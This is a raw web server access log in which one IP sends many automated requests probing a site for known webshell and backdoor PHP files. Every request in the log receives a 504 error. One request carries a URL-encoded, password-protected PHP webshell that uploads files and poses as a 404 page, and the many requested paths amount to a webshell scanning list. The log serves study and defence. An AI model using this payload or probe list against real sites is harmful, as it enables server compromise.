159.69.59.83 - - [02/Sep/2026:21:10:01 -0500] "GET /wp-blog-post.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:10:01 -0500] "GET /file-manager.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:10:01 -0500] "GET /autoload_classmap.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:10:01 -0500] "GET /templates/ja_purity/index.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:10:01 -0500] "GET /f.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:10:01 -0500] "GET /modules/modules/modules.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:10:01 -0500] "GET /date.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:10:01 -0500] "GET /1xleet.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:10:01 -0500] "GET /k.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:10:01 -0500] "GET /r.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:10:01 -0500] "GET /wp-content/think.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:10:01 -0500] "GET /7index.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:10:01 -0500] "GET /m.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:10:01 -0500] "GET /indoxploit.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:10:02 -0500] "GET /wp-22.php?sfilename=nyx.php&sfilecontent=%3C?php%20%0D%0Aerror_reporting(E_ERROR%20%7C%20E_PARSE);%0D%0Aif%20($_GET%5B%22pass%22%5D%20==%20%22nyxfallagatn%22)%7B%0D%0Aecho%20%22%3Cb%3ENyx_FallagaTeam%3C/b%3E%3Cbr%3E%22;%0D%0Aecho%20'%3Cb%3ESystem%20Info:%3C/b%3E%20'.php_uname();%0D%0Aecho%20'%3Cform%20action=%22%22%20method=%22post%22%20enctype=%22multipart/form-data%22%20name=%22uploader%22%20id=%22uploader%22%3E';%0D%0Aecho%20'%3Cinput%20type=%22file%22%20name=%22file%22%20size=%2250%22%3E%3Cinput%20name=%22_upl%22%20type=%22submit%22%20id=%22_upl%22%20value=%22Upload%22%3E%3C/form%3E';%0D%0Aif(%20$_POST%5B'_upl'%5D%20==%20%22Upload%22%20)%20%7B%0D%0Aif(@copy($_FILES%5B'file'%5D%5B'tmp_name'%5D,%20$_FILES%5B'file'%5D%5B'name'%5D))%20%7B%0D%0Aecho%20'%3Cb%3ESuccess!%3C/b%3E%3Cbr%3E%3Cbr%3E';%20%0D%0A%7Delse%20%7B%20echo%20'Failed!%3C/b%3E%3Cbr%3E%3Cbr%3E';%20%7D%7D%0D%0A%7Delse%7B%0D%0A$domain%20=%20$_SERVER%5B'SERVER_NAME'%5D;%0D%0Aecho'%3Chtml%3E%3Chead%3E%0D%0A%3Ctitle%3E404%20Not%20Found%3C/title%3E%0D%0A%3C/head%3E%3Cbody%3E%0D%0A%3Ch1%3ENot%20Found%3C/h1%3E%0D%0A%3Cp%3EThe%20requested%20URL%20was%20not%20found%20on%20this%20server.%3C/p%3E%0D%0A%3Chr%3E%0D%0A%3Caddress%3EApache/2.4.38%20(Ubuntu)%20Server%20at%20'.$domain.'%20Port%20443%3C/address%3E%0D%0A%3C/body%3E%3C/html%3E';%7D%0D%0A?%3E%0D%0A&supfiles=nyx.php&User-Agent=Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F108.0.0.0+Safari%2F537.36 HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:10:03 -0500] "GET /nasgor.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:03 -0500] "GET /wp-content/xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:03 -0500] "GET /wp-mna.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:04 -0500] "GET /wp-admin/shell.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:04 -0500] "GET /wp-includes/theme-cron.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:04 -0500] "GET /uploads/l.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:04 -0500] "GET /wikindex.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:04 -0500] "GET /anone.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:04 -0500] "GET /s_ne.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:04 -0500] "GET /wp-admin/includes/class-wp-pagebuilders-9LlwKf.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:04 -0500] "GET /wp-includes/images/media/xwsoooo.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:05 -0500] "GET /wp-content/languages/sidwso.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:05 -0500] "GET /6index.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:05 -0500] "GET /new.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:05 -0500] "GET /0byte.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:05 -0500] "GET /wp-content/plugins/cekidot/alf.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:05 -0500] "GET /new-index.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:05 -0500] "GET /7yn.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:05 -0500] "GET /symlink.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:05 -0500] "GET /wp_class_datalib.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:05 -0500] "GET /images/c99.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:05 -0500] "GET /404.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:06 -0500] "GET /RxR.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:06 -0500] "GET /wp-info.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:06 -0500] "GET /11index.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:06 -0500] "GET /V5.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:06 -0500] "GET /wp-admin/bala.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:09:58 -0500] "GET /mi.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:10:06 -0500] "GET /site/wp-content/themes/seotheme/mar.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:06 -0500] "GET /qindex.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:06 -0500] "GET /w.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:06 -0500] "GET /ups.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:06 -0500] "GET /wp-content/plugins/widget-logic/mini.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:06 -0500] "GET /t.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:06 -0500] "GET /wp-content/themes/config.bak.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:06 -0500] "GET /wp.php?Chitoge HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:10:07 -0500] "GET /mailer.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:07 -0500] "GET /sym403.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:07 -0500] "GET /wp-content/uploads/wp-stream.php HTTP/1.1" 504 247 "-" "python-requests/2.34.2"
159.69.59.83 - - [02/Sep/2026:21:10:08 -0500] "GET /templates/protostar/index.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:08 -0500] "GET /wp-content/vuln.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:08 -0500] "GET /wp-content/plugins/html404/wso25.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:08 -0500] "GET /www.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:08 -0500] "GET /wp-includes/about.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:08 -0500] "GET /wp-admin/includes/maint/wp-cron.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:08 -0500] "GET /8index.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:08 -0500] "GET /srx.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:08 -0500] "GET /wp-includes/pomo/config.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:08 -0500] "GET /wp-admin/wso.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:08 -0500] "GET /alfashell.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:08 -0500] "GET /goods.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:08 -0500] "GET /server.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:08 -0500] "GET /wp-includes/pomo/repair.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:08 -0500] "GET /wp-includes/css/wp-atom.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:08 -0500] "GET /wp-admin/images/atomlib.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:08 -0500] "GET /wp-content/bala.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:08 -0500] "GET /xz.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:08 -0500] "GET /.wp-cache.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:09 -0500] "GET /images/fx.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:09 -0500] "GET /.well-known/leaf.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:09 -0500] "GET /mi.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:09 -0500] "GET /uploads/s4.phtml HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:09 -0500] "GET /3.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:09 -0500] "GET /wp-includes/images/wp-blog.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:09 -0500] "GET /kk.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:09 -0500] "GET /wp-includes/wso112233.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:09 -0500] "GET /wp-includes/pomo/wp-cli.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:09 -0500] "GET /wp-content/upgrade/wp-signup.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:09 -0500] "GET /lufix.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:09 -0500] "GET /V3.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:09 -0500] "GET /0.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:09 -0500] "GET /alfa123.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:09 -0500] "GET /wp-content/db-cache.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:09 -0500] "GET /ws.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:10 -0500] "GET /wp-includes/wp-red.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:10 -0500] "GET /templates/beez_20/error.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:11 -0500] "GET /wp-includes/991176.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
157.90.185.123 - - [02/Sep/2026:21:10:16 -0500] "POST /wp-cron.php?doing_wp_cron=1788401416.9727680683135986328125 HTTP/1.1" 504 247 "-" "WordPress/7.1; https://effefe.com"
159.69.59.83 - - [02/Sep/2026:21:10:27 -0500] "GET /new.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:27 -0500] "GET /uploads/s4.phtml HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:27 -0500] "GET /t.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:27 -0500] "GET /w.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:27 -0500] "GET /ups.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:27 -0500] "GET /mailer.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:27 -0500] "GET /wp-content/themes/config.bak.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:27 -0500] "GET /wp-includes/images/wp-blog.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:27 -0500] "GET /6index.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:27 -0500] "GET /3.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:27 -0500] "GET /wp-content/plugins/cekidot/alf.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:27 -0500] "GET /11index.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:27 -0500] "GET /wp-content/xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:27 -0500] "GET /images/fx.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:27 -0500] "GET /wp-content/db-cache.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
